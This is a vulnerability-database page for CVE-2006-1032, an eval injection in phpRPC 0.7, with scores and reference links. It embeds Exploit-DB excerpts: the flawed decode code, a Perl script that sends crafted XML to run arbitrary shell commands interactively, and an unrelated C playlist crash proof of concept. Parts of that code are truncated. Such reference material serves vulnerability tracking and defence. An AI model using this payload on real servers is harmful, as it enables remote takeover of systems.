CVE-2006-1032
published 2006-03-07CVE-2006-1032: Eval injection vulnerability in the decode function in rpc_decoder.php for phpRPC 0.7 and earlier, as used by runcms, exoops, and possibly other programs…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.48%
87.7th percentile
Eval injection vulnerability in the decode function in rpc_decoder.php for phpRPC 0.7 and earlier, as used by runcms, exoops, and possibly other programs, allows remote attackers to execute arbitrary PHP code via the base64 tag.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phprpc | phprpc | — | — |
| phprpc | phprpc | — | — |
| phprpc | phprpc | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpRPC < 0.7 - Remote Code Execution
exploitdb·2016-02-26·CVSS 7.5
CVE-2006-1032 [HIGH] phpRPC < 0.7 - Remote Code Execution
phpRPC parser = xml_parser_create($this->encoding);
xml_set_object($this->parser, &$this);
xml_set_element_handler($this->parser, "tag_open", "tag_close");
xml_set_character_data_handler($this->parser, "cdata");
xml_parser_set_option($this->parser, XML_OPTION_SKIP_WHITE, 1);
xml_parser_set_option($this->parser, XML_OPTION_CASE_FOLDING, 1);
xml_parser_set_option($this->parser, XML_OPTION_TARGET_ENCODING, $this->encoding);
xml_parse($this->parser, $data);
xml_parser_free($this->parser);
if ($this->debug == 1) { $this->dump(); }
eval($this->code);
return $params;
}
The variable $this->code in our case is constructed by the cdata() function, and is never sanitized when placed within a base64 tag. I guess this is because it is assumed that the data will be base64 encrypted and thus harmless,
Exploit-DB
Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)
exploitdb·2006-11-28
CVE-2006-6261 Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)
Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)
---
/*
0-day Quintessential Player
#include
#include
int main(int argc, char *argv[])
{
FILE *Exploit;
char buffer[1032]; /* Corruption Occurs after 1028 bytes */
int x;
printf("\n======================================================================\n");
printf("0-day Quintessential Player 4.50.1.82 and prior Playlist Denial Of Service PoC \n");
printf("Crashes Quintessential Player with a malformed playlist on load.\n");
printf("Discovered and Coded By: Greg Linares \n");
printf("Usage: %s \n", argv[0]);
printf("====================================================================\n\n\n");
if (argc Greg Linares (GLinares.code[at]gmail[dot]com)\n");
fclose(Exploit);
return 0;
}
// milw0rm.com [2006-11-28]
Exploit-DB
phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)
exploitdb·2006-03-01
CVE-2006-1032 phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)
phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)
---
#!/usr/bin/perl
#
#root@host [~]# perl rpc.pl phprpc.sourceforge.net /modules/phpRPC/server.php
#--== IHS IRAN HOMELAND SECURITY ==--
#
#phpRPC new( Proto => "tcp", PeerAddr => "$host",
PeerPort => "80") || die "connecterror\n";
while (1) {
print '[IRAN HOMELAND SECURITY]$ ';
$cmd = ;
chop($cmd);
last if ($cmd eq 'exit');
$xmldata = "test.method'));echo '_begin_\n';echo `".$cmd."`;echo '_end_\n';exit;";
print $sock "POST ".$xml." HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: text/xml\n";
print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
$good=0;
while ($ans = )
{
if ($good == 1) { print "$ans"; }
last if ($ans =~ /^_end_/);
if ($ans =~ /^_begin_/) { $good = 1; }
}
if ($good==0) {
No writeups or analysis indexed.
http://secunia.com/advisories/19028http://secunia.com/advisories/19058http://securityreason.com/securityalert/502http://securitytracker.com/id?1015691http://www.gulftech.org/?node=research&article_id=00105-02262006http://www.securityfocus.com/archive/1/426193http://www.securityfocus.com/bid/16833http://www.vupen.com/english/advisories/2006/0745http://secunia.com/advisories/19028http://secunia.com/advisories/19058http://securityreason.com/securityalert/502http://securitytracker.com/id?1015691http://www.gulftech.org/?node=research&article_id=00105-02262006http://www.securityfocus.com/archive/1/426193http://www.securityfocus.com/bid/16833http://www.vupen.com/english/advisories/2006/0745
2006-03-07
Published